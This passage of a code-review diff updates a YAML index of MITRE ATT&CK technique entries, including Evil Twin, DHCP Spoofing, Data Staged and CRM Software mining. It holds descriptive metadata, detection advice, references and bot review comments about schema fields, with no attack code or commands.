+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1602.002:
technique:
x_mitre_platforms:
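Review bot: `x_mitre_attack_spec_version: 2.1.0` is dropped from T1560.002 together with `spec_version: '2.1'`, but no replacement value appears in this hunk, whereas the newly added T1557.004 entry below carries `x_mitre_attack_spec_version: 3.2.0` (the same happens for T1602.002 and T1185 later in the diff). Please confirm the field is still emitted for those techniques elsewhere in each object, otherwise consumers that read it will see it vanish for exactly the techniques that were not re-serialized. The T1557.004 block itself is consistent with the other 3.2.0 entries; `x_mitre_detection: ''` and `atomic_tests: []` are expected for a sub-technique that has no atomics yet.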
@@ -40133,7 +40694,7 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
by Cyber Actors. Retrieved October 2, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-17T19:50:46.948Z'
name: Network Device Configuration Dump
description: "Adversaries may access network configuration files to collect
sensitive data about the device and the network. The network configuration
@@ -40163,8 +40724,6 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1560:
technique:
@@ -40218,7 +40777,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560
atomic_tests: []
T1185:
@@ -40255,7 +40813,7 @@ collection:
description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
Retrieved May 24, 2017.
source_name: cobaltstrike manual
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-25T18:58:15.229Z'
name: Browser Session Hijacking
description: |-
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -40283,12 +40841,10 @@ collection:
- Administrator
- SYSTEM
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -40325,23 +40881,23 @@ collection:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -40374,21 +40930,20 @@ collection:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
@@ -40496,12 +41051,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -40512,13 +41066,13 @@ collection:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -40532,6 +41086,7 @@ collection:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -40542,12 +41097,12 @@ collection:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1125:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.205Z'
name: Video Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -40592,30 +41147,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1125
atomic_tests: []
T1213.001:
technique:
- x_mitre_platforms:
- - SaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
- type: attack-pattern
- created: '2020-02-14T13:09:51.004Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.001
- url: https://attack.mitre.org/techniques/T1213/001
- - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
- description: Atlassian. (2018, January 9). How to Enable User Access Logging.
- Retrieved April 4, 2018.
- source_name: Atlassian Confluence Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-30T13:45:42.840Z'
name: Confluence
description: |2
@@ -40625,31 +41161,48 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+ created: '2020-02-14T13:09:51.004Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/001
+ external_id: T1213.001
+ - source_name: Atlassian Confluence Logging
+ description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+ Retrieved April 4, 2018.
+ url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1114.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Email Forwarding Rule'
description: "Adversaries may setup email forwarding rules to collect sensitive
information. Adversaries may abuse email forwarding rules to monitor the activities
@@ -40682,10 +41235,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Security
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
- Liran Ravich, CardinalOps
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
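Review bot: key order is inconsistent between regenerated entries. T1114.003 (and T1114.002 below) places `x_mitre_attack_spec_version` directly after `kill_chain_phases`, while T1557.004, T1213.001 and T1074 place it after `object_marking_refs`; the index appears to mirror whatever order the upstream STIX object uses. If this file is meant to be diffable across ATT&CK releases, consider having the generator sort keys (or emit a fixed order) so future diffs show content changes rather than reshuffles.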
@@ -40694,16 +41249,17 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
+ - 'Cloud Service: Cloud Service Metadata'
type: attack-pattern
id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
created: '2020-02-19T18:54:47.103Z'
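Review bot: the platform list for T1114.003 drops `Office 365` and `Google Workspace` and adds `Office Suite` (T1114.002 gets the same change below). Any per-platform index or filter that is still keyed on the old platform names will no longer match these techniques, so the platform-specific index files and any tests that declare `supported_platforms` with the old names should be checked in the same change.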
@@ -40735,70 +41291,66 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.003
atomic_tests: []
T1074:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Shane Tully, @securitygypsy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
- created: '2017-05-31T21:30:58.938Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1074
- url: https://attack.mitre.org/techniques/T1074
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: PWC Cloud Hopper April 2017
- url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
- description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
- April 5, 2017.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Data Staged
description: |-
Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data Staged
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ - Shane Tully, @securitygypsy
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'File: File Access'
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+ created: '2017-05-31T21:30:58.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074
+ external_id: T1074
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: PWC Cloud Hopper April 2017
+ description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+ April 5, 2017.
+ url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
@@ -40871,7 +41423,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1039:
@@ -40926,12 +41477,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1039
atomic_tests: []
T1114.002:
technique:
- modified: '2023-05-31T12:34:03.420Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Remote Email Collection'
description: Adversaries may target an Exchange server, Office 365, or Google
Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -40943,6 +41493,9 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
locations, especially for privileged accounts (ex: Exchange administrator
@@ -40950,11 +41503,11 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -40971,14 +41524,11 @@ collection:
external_id: T1114.002
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.002
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -40994,6 +41544,7 @@ collection:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -41002,13 +41553,13 @@ collection:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -41016,15 +41567,11 @@ collection:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
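Review bot: `x_mitre_permissions_required` is removed from T1056 here, and from T1213.001 earlier in the diff, but T1602.002 still carries the same field (`- Administrator`) as unchanged context near the top of the diff. If the field is being retired along with the move to attack spec 3.2.0, T1602.002 should lose it as well; if the index is simply mirroring the upstream objects, a one-line note in the PR description saying so would save the next reviewer the same question.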
@@ -41035,9 +41582,60 @@ collection:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1213.004:
+ technique:
+ modified: '2024-10-17T14:36:24.983Z'
+ name: Customer Relationship Management Software
+ description: |-
+ Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+ Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+ CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Centre for Cybersecurity Belgium (CCB)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Logon Session: Logon Session Creation'
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+ created: '2024-07-01T20:06:13.664Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/004
+ external_id: T1213.004
+ - source_name: Bleeping Computer Bank Hack 2020
+ description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+ 100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+ - source_name: Bleeping Computer Mint Mobile Hack 2021
+ description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+ after numbers ported, data accessed. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+ - source_name: Bleeping Computer US Cellular Hack 2022
+ description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+ after billing system hack. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
@@ -41083,7 +41681,7 @@ collection:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -41102,37 +41700,36 @@ collection:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.003:
technique:
- modified: '2022-10-18T22:44:01.723Z'
+ modified: '2024-09-04T13:03:54.101Z'
name: Code Repositories
description: |-
Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
- Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+ Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Toby Kohlenberg
+ - Josh Liburdi, @jshlbrd
+ x_mitre_deprecated: false
x_mitre_detection: Monitor access to code repositories, especially performed
by privileged users such as Active Directory Domain or Enterprise Administrators
as these types of accounts should generally not be used to access code repositories.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user-based anomalies.
- x_mitre_platforms:
- - SaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Toby Kohlenberg
- - Josh Liburdi, @jshlbrd
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
